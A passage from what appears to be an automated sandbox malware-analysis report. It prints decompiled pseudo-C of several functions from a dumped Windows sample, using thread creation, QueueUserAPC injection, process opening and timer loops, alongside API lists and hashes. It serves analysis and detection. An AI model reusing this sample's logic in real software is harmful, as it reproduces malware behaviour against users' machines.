                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL(00000000,?), ref: 026F127E
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Heap$Free$CountCriticalSectionTicklstrcatlstrcpywsprintf$AllocAllocateEnterInterface_LeaveProxyQueryStringTrimUnknown_lstrlenmbstowcsmemsetwcstombs
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4121355665-0
                                                                                                                                                                                                                        • Opcode ID: 17159dde7145fed8c4eeae6f825477a3383f316c63d18731a3a2fe1f5ca25756
                                                                                                                                                                                                                        • Instruction ID: ec78e3b1ca298a1b9807fdd1d2ed7a7ecba9537537c48b3c821d9de7fd1ea72e
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 17159dde7145fed8c4eeae6f825477a3383f316c63d18731a3a2fe1f5ca25756
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CD716871940208EFCF91DFA4DC88E9E7BB9EF49354B115855F609D7210C731A9A2DFA0
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 85%
                                                                                                                                                                                                                        			E02191F17(void* __ecx, void* __edx, void* __edi, long _a4) {
                                                                                                                                                                                                                        				long _v8;
                                                                                                                                                                                                                        				void* _v32;
                                                                                                                                                                                                                        				long _t21;
                                                                                                                                                                                                                        				long _t23;
                                                                                                                                                                                                                        				long _t25;
                                                                                                                                                                                                                        				void* _t26;
                                                                                                                                                                                                                        				long _t29;
                                                                                                                                                                                                                        				long _t30;
                                                                                                                                                                                                                        				long _t34;
                                                                                                                                                                                                                        				void* _t39;
                                                                                                                                                                                                                        				intOrPtr _t42;
                                                                                                                                                                                                                        				void* _t47;
                                                                                                                                                                                                                        				void* _t52;
                                                                                                                                                                                                                        				signed int _t55;
                                                                                                                                                                                                                        				void* _t57;
                                                                                                                                                                                                                        				intOrPtr* _t58;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t47 = __ecx;
                                                                                                                                                                                                                        				_t21 = E021910D8();
                                                                                                                                                                                                                        				_v8 = _t21;
                                                                                                                                                                                                                        				if(_t21 != 0) {
                                                                                                                                                                                                                        					return _t21;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				do {
                                                                                                                                                                                                                        					_t55 = SwitchToThread() + 8;
                                                                                                                                                                                                                        					_t23 = E02191B04(__edi, _t55); // executed
                                                                                                                                                                                                                        					_v8 = _t23;
                                                                                                                                                                                                                        					Sleep(0x20 + _t55 * 4); // executed
                                                                                                                                                                                                                        					_t25 = _v8;
                                                                                                                                                                                                                        				} while (_t25 == 0xc);
                                                                                                                                                                                                                        				if(_t25 != 0) {
                                                                                                                                                                                                                        					L21:
                                                                                                                                                                                                                        					return _t25;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_push(__edi);
                                                                                                                                                                                                                        				if(_a4 != 0) {
                                                                                                                                                                                                                        					L11:
                                                                                                                                                                                                                        					_t26 = CreateThread(0, 0, __imp__SleepEx,  *0x2194140, 0, 0); // executed
                                                                                                                                                                                                                        					_t57 = _t26;
                                                                                                                                                                                                                        					if(_t57 == 0) {
                                                                                                                                                                                                                        						L18:
                                                                                                                                                                                                                        						_v8 = GetLastError();
                                                                                                                                                                                                                        						L19:
                                                                                                                                                                                                                        						_t25 = _v8;
                                                                                                                                                                                                                        						if(_t25 == 0xffffffff) {
                                                                                                                                                                                                                        							_t25 = GetLastError();
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						goto L21;
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					_t29 = QueueUserAPC(E02191280, _t57,  &_v32); // executed
                                                                                                                                                                                                                        					if(_t29 == 0) {
                                                                                                                                                                                                                        						_t34 = GetLastError();
                                                                                                                                                                                                                        						_a4 = _t34;
                                                                                                                                                                                                                        						TerminateThread(_t57, _t34);
                                                                                                                                                                                                                        						CloseHandle(_t57);
                                                                                                                                                                                                                        						_t57 = 0;
                                                                                                                                                                                                                        						SetLastError(_a4);
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					if(_t57 == 0) {
                                                                                                                                                                                                                        						goto L18;
                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                        						_t30 = WaitForSingleObject(_t57, 0xffffffff);
                                                                                                                                                                                                                        						_v8 = _t30;
                                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                                        							GetExitCodeThread(_t57,  &_v8);
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						CloseHandle(_t57);
                                                                                                                                                                                                                        						goto L19;
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				if(E021918FC(_t47,  &_a4) != 0) {
                                                                                                                                                                                                                        					 *0x2194138 = 0;
                                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_t58 = __imp__GetLongPathNameW;
                                                                                                                                                                                                                        				_t39 =  *_t58(_a4, 0, 0); // executed
                                                                                                                                                                                                                        				_t52 = _t39;
                                                                                                                                                                                                                        				if(_t52 == 0) {
                                                                                                                                                                                                                        					L9:
                                                                                                                                                                                                                        					 *0x2194138 = _a4;
                                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_t10 = _t52 + 2; // 0x2
                                                                                                                                                                                                                        				_t42 = E0219163D(_t52 + _t10);
                                                                                                                                                                                                                        				 *0x2194138 = _t42;
                                                                                                                                                                                                                        				if(_t42 == 0) {
                                                                                                                                                                                                                        					goto L9;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				 *_t58(_a4, _t42, _t52); // executed
                                                                                                                                                                                                                        				E02191628(_a4);
                                                                                                                                                                                                                        				goto L11;
                                                                                                                                                                                                                        			}



















                                                                                                                                                                                                                        0x02191f17
                                                                                                                                                                                                                        0x02191f1e
                                                                                                                                                                                                                        0x02191f25
                                                                                                                                                                                                                        0x02191f2a
                                                                                                                                                                                                                        0x0219204b
                                                                                                                                                                                                                        0x0219204b
                                                                                                                                                                                                                        0x02191f31
                                                                                                                                                                                                                        0x02191f39
                                                                                                                                                                                                                        0x02191f3d
                                                                                                                                                                                                                        0x02191f42
                                                                                                                                                                                                                        0x02191f4d
                                                                                                                                                                                                                        0x02191f53
                                                                                                                                                                                                                        0x02191f56
                                                                                                                                                                                                                        0x02191f5d
                                                                                                                                                                                                                        0x02192048
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x02192048
                                                                                                                                                                                                                        0x02191f63
                                                                                                                                                                                                                        0x02191f67
                                                                                                                                                                                                                        0x02191fbd
                                                                                                                                                                                                                        0x02191fcd
                                                                                                                                                                                                                        0x02191fd3
                                                                                                                                                                                                                        0x02191fdd
                                                                                                                                                                                                                        0x02192038
                                                                                                                                                                                                                        0x0219203a
                                                                                                                                                                                                                        0x0219203d
                                                                                                                                                                                                                        0x0219203d
                                                                                                                                                                                                                        0x02192044
                                                                                                                                                                                                                        0x02192046
                                                                                                                                                                                                                        0x02192046
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x02192044
                                                                                                                                                                                                                        0x02191fe9
                                                                                                                                                                                                                        0x02191ff7
                                                                                                                                                                                                                        0x02191ff9
                                                                                                                                                                                                                        0x02191ffd
                                                                                                                                                                                                                        0x02192000
                                                                                                                                                                                                                        0x02192007
                                                                                                                                                                                                                        0x0219200c
                                                                                                                                                                                                                        0x0219200e
                                                                                                                                                                                                                        0x0219200e
                                                                                                                                                                                                                        0x02192016
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x02192018
                                                                                                                                                                                                                        0x0219201b
                                                                                                                                                                                                                        0x02192021
                                                                                                                                                                                                                        0x02192026
                                                                                                                                                                                                                        0x0219202d
                                                                                                                                                                                                                        0x0219202d
                                                                                                                                                                                                                        0x02192034
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x02192034
                                                                                                                                                                                                                        0x02192016
                                                                                                                                                                                                                        0x02191f74
                                                                                                                                                                                                                        0x02191fb7
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x02191fb7
                                                                                                                                                                                                                        0x02191f76
                                                                                                                                                                                                                        0x02191f81
                                                                                                                                                                                                                        0x02191f83
                                                                                                                                                                                                                        0x02191f87
                                                                                                                                                                                                                        0x02191fad
                                                                                                                                                                                                                        0x02191fb0
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x02191fb0
                                                                                                                                                                                                                        0x02191f89
                                                                                                                                                                                                                        0x02191f8e
                                                                                                                                                                                                                        0x02191f93
                                                                                                                                                                                                                        0x02191f9a
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x02191fa1
                                                                                                                                                                                                                        0x02191fa6
                                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 021910D8: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,02191F23), ref: 021910E7
                                                                                                                                                                                                                          • Part of subcall function 021910D8: GetVersion.KERNEL32(?,02191F23), ref: 021910F6
                                                                                                                                                                                                                          • Part of subcall function 021910D8: GetCurrentProcessId.KERNEL32(?,02191F23), ref: 02191112
                                                                                                                                                                                                                          • Part of subcall function 021910D8: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,02191F23), ref: 0219112B
                                                                                                                                                                                                                        • SwitchToThread.KERNEL32 ref: 02191F31
                                                                                                                                                                                                                          • Part of subcall function 02191B04: VirtualAlloc.KERNELBASE(00000000,-00000008,00003000,00000004,00000000,?,-00000008,-00000008), ref: 02191B5A
                                                                                                                                                                                                                          • Part of subcall function 02191B04: memcpy.NTDLL(?,?,-00000008,?,?,?,?,?,?,?,?,02191F42,-00000008), ref: 02191BEC
                                                                                                                                                                                                                          • Part of subcall function 02191B04: VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02191C07
                                                                                                                                                                                                                        • Sleep.KERNELBASE(00000000,-00000008), ref: 02191F4D
                                                                                                                                                                                                                        • GetLongPathNameW.KERNEL32 ref: 02191F81
                                                                                                                                                                                                                        • GetLongPathNameW.KERNEL32 ref: 02191FA1
                                                                                                                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,00000000,00000000), ref: 02191FCD
                                                                                                                                                                                                                        • QueueUserAPC.KERNELBASE(02191280,00000000,?), ref: 02191FE9
                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 02191FF9
                                                                                                                                                                                                                        • TerminateThread.KERNEL32(00000000,00000000), ref: 02192000
                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02192007
                                                                                                                                                                                                                        • SetLastError.KERNEL32(?), ref: 0219200E
                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0219201B
                                                                                                                                                                                                                        • GetExitCodeThread.KERNEL32(00000000,?), ref: 0219202D
                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02192034
                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 02192038
                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 02192046
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925081715.0000000002190000.00000040.00020000.sdmp, Offset: 02190000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925087488.0000000002195000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925092020.0000000002197000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ErrorLastThread$CloseCreateHandleLongNamePathProcessVirtual$AllocCodeCurrentEventExitFreeObjectOpenQueueSingleSleepSwitchTerminateUserVersionWaitmemcpy
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3896949738-0
                                                                                                                                                                                                                        • Opcode ID: 3e852324b439e132f5259a0c949178da62a05b38d8486b5798ce707805b9b820
                                                                                                                                                                                                                        • Instruction ID: 65b566717318d1d3ade25609e137c84c945ea3e9af373cbed29333f904af5810
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3e852324b439e132f5259a0c949178da62a05b38d8486b5798ce707805b9b820
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 26315C71C80219BFDF11AFA4DC889AF7BE8FB082947184965F919D3200E7349ED5DBA1
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 83%
                                                                                                                                                                                                                        			E026F6130(void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                        				void _v48;
                                                                                                                                                                                                                        				long _v52;
                                                                                                                                                                                                                        				struct %anon52 _v60;
                                                                                                                                                                                                                        				char _v72;
                                                                                                                                                                                                                        				long _v76;
                                                                                                                                                                                                                        				void* _v80;
                                                                                                                                                                                                                        				union _LARGE_INTEGER _v84;
                                                                                                                                                                                                                        				struct %anon52 _v92;
                                                                                                                                                                                                                        				void* _v96;
                                                                                                                                                                                                                        				void* _v100;
                                                                                                                                                                                                                        				union _LARGE_INTEGER _v104;
                                                                                                                                                                                                                        				long _v108;
                                                                                                                                                                                                                        				intOrPtr _v120;
                                                                                                                                                                                                                        				struct %anon52 _v128;
                                                                                                                                                                                                                        				struct %anon52 _t46;
                                                                                                                                                                                                                        				void* _t51;
                                                                                                                                                                                                                        				long _t53;
                                                                                                                                                                                                                        				void* _t54;
                                                                                                                                                                                                                        				struct %anon52 _t60;
                                                                                                                                                                                                                        				long _t64;
                                                                                                                                                                                                                        				struct %anon52 _t65;
                                                                                                                                                                                                                        				void* _t68;
                                                                                                                                                                                                                        				void* _t72;
                                                                                                                                                                                                                        				signed int _t73;
                                                                                                                                                                                                                        				void* _t75;
                                                                                                                                                                                                                        				void* _t78;
                                                                                                                                                                                                                        				void** _t82;
                                                                                                                                                                                                                        				signed int _t86;
                                                                                                                                                                                                                        				void* _t89;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t75 = __edx;
                                                                                                                                                                                                                        				_v52 = 0;
                                                                                                                                                                                                                        				memset( &_v48, 0, 0x2c);
                                                                                                                                                                                                                        				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
                                                                                                                                                                                                                        				_t46 = CreateWaitableTimerA(0, 1, 0);
                                                                                                                                                                                                                        				_v60 = _t46;
                                                                                                                                                                                                                        				if(_t46 == 0) {
                                                                                                                                                                                                                        					_v92.HighPart = GetLastError();
                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                        					_push(0xffffffff);
                                                                                                                                                                                                                        					_push(0xff676980);
                                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                                        					_push( *0x26fd240);
                                                                                                                                                                                                                        					_v76 = 0;
                                                                                                                                                                                                                        					_v80 = 0;
                                                                                                                                                                                                                        					L026FAE98();
                                                                                                                                                                                                                        					_v84.LowPart = _t46;
                                                                                                                                                                                                                        					_v80 = _t75;
                                                                                                                                                                                                                        					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
                                                                                                                                                                                                                        					_t51 =  *0x26fd26c; // 0x2c4
                                                                                                                                                                                                                        					_v76 = _t51;
                                                                                                                                                                                                                        					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
                                                                                                                                                                                                                        					_v108 = _t53;
                                                                                                                                                                                                                        					if(_t53 == 0) {
                                                                                                                                                                                                                        						if(_a8 != 0) {
                                                                                                                                                                                                                        							L4:
                                                                                                                                                                                                                        							 *0x26fd24c = 5;
                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                        							_t68 = E026F6A7F(); // executed
                                                                                                                                                                                                                        							if(_t68 != 0) {
                                                                                                                                                                                                                        								goto L4;
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						_v104.LowPart = 0;
                                                                                                                                                                                                                        						L6:
                                                                                                                                                                                                                        						L6:
                                                                                                                                                                                                                        						if(_v104.LowPart == 1 && ( *0x26fd260 & 0x00000001) == 0) {
                                                                                                                                                                                                                        							_v104.LowPart = 2;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						_t73 = _v104.LowPart;
                                                                                                                                                                                                                        						_t58 = _t73 << 4;
                                                                                                                                                                                                                        						_t78 = _t89 + (_t73 << 4) + 0x3c;
                                                                                                                                                                                                                        						_t74 = _t73 + 1;
                                                                                                                                                                                                                        						_v92.LowPart = _t73 + 1;
                                                                                                                                                                                                                        						_t60 = E026F5B7A(_t74, _t78, _t74, _t89 + _t58 + 0x3c, _t78,  &_v96,  &_v100); // executed
                                                                                                                                                                                                                        						_v128.LowPart = _t60;
                                                                                                                                                                                                                        						if(_t60 != 0) {
                                                                                                                                                                                                                        							goto L17;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						_t65 = _v92;
                                                                                                                                                                                                                        						_v104.LowPart = _t65;
                                                                                                                                                                                                                        						_t97 = _t65 - 3;
                                                                                                                                                                                                                        						if(_t65 != 3) {
                                                                                                                                                                                                                        							goto L6;
                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                        							_v120 = E026F8155(_t74, _t97,  &_v72, _a4, _a8);
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						goto L12;
                                                                                                                                                                                                                        						L17:
                                                                                                                                                                                                                        						__eflags = _t60 - 0x10d2;
                                                                                                                                                                                                                        						if(_t60 != 0x10d2) {
                                                                                                                                                                                                                        							_push(0xffffffff);
                                                                                                                                                                                                                        							_push(0xff676980);
                                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                                        							_push( *0x26fd244);
                                                                                                                                                                                                                        							goto L21;
                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                        							__eflags =  *0x26fd248; // 0x0
                                                                                                                                                                                                                        							if(__eflags == 0) {
                                                                                                                                                                                                                        								goto L12;
                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                        								_t60 = E026F5225();
                                                                                                                                                                                                                        								_push(0xffffffff);
                                                                                                                                                                                                                        								_push(0xdc3cba00);
                                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                                        								_push( *0x26fd248);
                                                                                                                                                                                                                        								L21:
                                                                                                                                                                                                                        								L026FAE98();
                                                                                                                                                                                                                        								_v104.LowPart = _t60;
                                                                                                                                                                                                                        								_v100 = _t78;
                                                                                                                                                                                                                        								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
                                                                                                                                                                                                                        								_t64 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
                                                                                                                                                                                                                        								_v128 = _t64;
                                                                                                                                                                                                                        								__eflags = _t64;
                                                                                                                                                                                                                        								if(_t64 == 0) {
                                                                                                                                                                                                                        									goto L6;
                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                        									goto L12;
                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						L25:
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                                        					_t82 =  &_v72;
                                                                                                                                                                                                                        					_t72 = 3;
                                                                                                                                                                                                                        					do {
                                                                                                                                                                                                                        						_t54 =  *_t82;
                                                                                                                                                                                                                        						if(_t54 != 0) {
                                                                                                                                                                                                                        							HeapFree( *0x26fd238, 0, _t54);
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						_t82 =  &(_t82[4]);
                                                                                                                                                                                                                        						_t72 = _t72 - 1;
                                                                                                                                                                                                                        					} while (_t72 != 0);
                                                                                                                                                                                                                        					CloseHandle(_v80);
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				return _v92.HighPart;
                                                                                                                                                                                                                        				goto L25;
                                                                                                                                                                                                                        			}
































                                                                                                                                                                                                                        0x026f6130
                                                                                                                                                                                                                        0x026f6146
                                                                                                                                                                                                                        0x026f614a
                                                                                                                                                                                                                        0x026f614f
                                                                                                                                                                                                                        0x026f6156
                                                                                                                                                                                                                        0x026f615c
                                                                                                                                                                                                                        0x026f6162
                                                                                                                                                                                                                        0x026f62ea
                                                                                                                                                                                                                        0x026f6168
                                                                                                                                                                                                                        0x026f6168
                                                                                                                                                                                                                        0x026f616a
                                                                                                                                                                                                                        0x026f616f
                                                                                                                                                                                                                        0x026f6170
                                                                                                                                                                                                                        0x026f6176
                                                                                                                                                                                                                        0x026f617a
                                                                                                                                                                                                                        0x026f617e
                                                                                                                                                                                                                        0x026f618c
                                                                                                                                                                                                                        0x026f619a
                                                                                                                                                                                                                        0x026f619e
                                                                                                                                                                                                                        0x026f61a0
                                                                                                                                                                                                                        0x026f61ad
                                                                                                                                                                                                                        0x026f61b9
                                                                                                                                                                                                                        0x026f61bb
                                                                                                                                                                                                                        0x026f61c1
                                                                                                                                                                                                                        0x026f61ca
                                                                                                                                                                                                                        0x026f61d5
                                                                                                                                                                                                                        0x026f61d5
                                                                                                                                                                                                                        0x026f61cc
                                                                                                                                                                                                                        0x026f61cc
                                                                                                                                                                                                                        0x026f61d3
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f61d3
                                                                                                                                                                                                                        0x026f61df
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f61e3
                                                                                                                                                                                                                        0x026f61e8
                                                                                                                                                                                                                        0x026f61f3
                                                                                                                                                                                                                        0x026f61f3
                                                                                                                                                                                                                        0x026f61fb
                                                                                                                                                                                                                        0x026f6206
                                                                                                                                                                                                                        0x026f620e
                                                                                                                                                                                                                        0x026f6217
                                                                                                                                                                                                                        0x026f621a
                                                                                                                                                                                                                        0x026f621e
                                                                                                                                                                                                                        0x026f6223
                                                                                                                                                                                                                        0x026f6229
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f622b
                                                                                                                                                                                                                        0x026f622f
                                                                                                                                                                                                                        0x026f6233
                                                                                                                                                                                                                        0x026f6236
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f6238
                                                                                                                                                                                                                        0x026f6248
                                                                                                                                                                                                                        0x026f6248
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f6279
                                                                                                                                                                                                                        0x026f6279
                                                                                                                                                                                                                        0x026f627e
                                                                                                                                                                                                                        0x026f629d
                                                                                                                                                                                                                        0x026f629f
                                                                                                                                                                                                                        0x026f62a4
                                                                                                                                                                                                                        0x026f62a5
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f6280
                                                                                                                                                                                                                        0x026f6280
                                                                                                                                                                                                                        0x026f6286
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f6288
                                                                                                                                                                                                                        0x026f6288
                                                                                                                                                                                                                        0x026f628d
                                                                                                                                                                                                                        0x026f628f
                                                                                                                                                                                                                        0x026f6294
                                                                                                                                                                                                                        0x026f6295
                                                                                                                                                                                                                        0x026f62ab
                                                                                                                                                                                                                        0x026f62ab
                                                                                                                                                                                                                        0x026f62b3
                                                                                                                                                                                                                        0x026f62c1
                                                                                                                                                                                                                        0x026f62c5
                                                                                                                                                                                                                        0x026f62d1
                                                                                                                                                                                                                        0x026f62d3
                                                                                                                                                                                                                        0x026f62d7
                                                                                                                                                                                                                        0x026f62d9
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f62df
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f62df
                                                                                                                                                                                                                        0x026f62d9
                                                                                                                                                                                                                        0x026f6286
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f627e
                                                                                                                                                                                                                        0x026f624c
                                                                                                                                                                                                                        0x026f624e
                                                                                                                                                                                                                        0x026f6252
                                                                                                                                                                                                                        0x026f6253
                                                                                                                                                                                                                        0x026f6253
                                                                                                                                                                                                                        0x026f6257
                                                                                                                                                                                                                        0x026f6261
                                                                                                                                                                                                                        0x026f6261
                                                                                                                                                                                                                        0x026f6267
                                                                                                                                                                                                                        0x026f626a
                                                                                                                                                                                                                        0x026f626a
                                                                                                                                                                                                                        0x026f6271
                                                                                                                                                                                                                        0x026f6271
                                                                                                                                                                                                                        0x026f62f8
                                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • memset.NTDLL ref: 026F614A
                                                                                                                                                                                                                        • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 026F6156
                                                                                                                                                                                                                        • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 026F617E
                                                                                                                                                                                                                        • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 026F619E
                                                                                                                                                                                                                        • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,026F2051,?), ref: 026F61B9
                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,026F2051,?,00000000), ref: 026F6261
                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,026F2051,?,00000000,?,?), ref: 026F6271
                                                                                                                                                                                                                        • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 026F62AB
                                                                                                                                                                                                                        • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?,?), ref: 026F62C5
                                                                                                                                                                                                                        • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 026F62D1
                                                                                                                                                                                                                          • Part of subcall function 026F6A7F: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04B39358,00000000,?,73BCF710,00000000,73BCF730), ref: 026F6ACE
                                                                                                                                                                                                                          • Part of subcall function 026F6A7F: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04B39390,?,00000000,30314549,00000014,004F0053,04B3934C), ref: 026F6B6B
                                                                                                                                                                                                                          • Part of subcall function 026F6A7F: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,026F61D1), ref: 026F6B7D
                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,026F2051,?,00000000,?,?), ref: 026F62E4
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3521023985-0
                                                                                                                                                                                                                        • Opcode ID: 5e6ff56aa83e579cfc0f17e02ce70ef6f22b1505188713ac7869dd07ce754fd9
                                                                                                                                                                                                                        • Instruction ID: 6cde71dfbdd5a0bdd115e4a131082bfc67011660d135970d941b4303a8e96289
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5e6ff56aa83e579cfc0f17e02ce70ef6f22b1505188713ac7869dd07ce754fd9
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 62514B71808314AFCB90EF19DC84D6FBBACFB85724F104A1AFAA492250D771D555CF92
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 74%
                                                                                                                                                                                                                        			E026F8492(intOrPtr __edx, void** _a4, void** _a8) {
                                                                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                                                                        				struct _FILETIME* _v12;
                                                                                                                                                                                                                        				short _v56;
                                                                                                                                                                                                                        				struct _FILETIME* _t12;
                                                                                                                                                                                                                        				intOrPtr _t13;
                                                                                                                                                                                                                        				void* _t17;
                                                                                                                                                                                                                        				void* _t21;
                                                                                                                                                                                                                        				intOrPtr _t27;
                                                                                                                                                                                                                        				long _t28;
                                                                                                                                                                                                                        				void* _t30;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t27 = __edx;
                                                                                                                                                                                                                        				_t12 =  &_v12;
                                                                                                                                                                                                                        				GetSystemTimeAsFileTime(_t12);
                                                                                                                                                                                                                        				_push(0x192);
                                                                                                                                                                                                                        				_push(0x54d38000);
                                                                                                                                                                                                                        				_push(_v8);
                                                                                                                                                                                                                        				_push(_v12);
                                                                                                                                                                                                                        				L026FAE92();
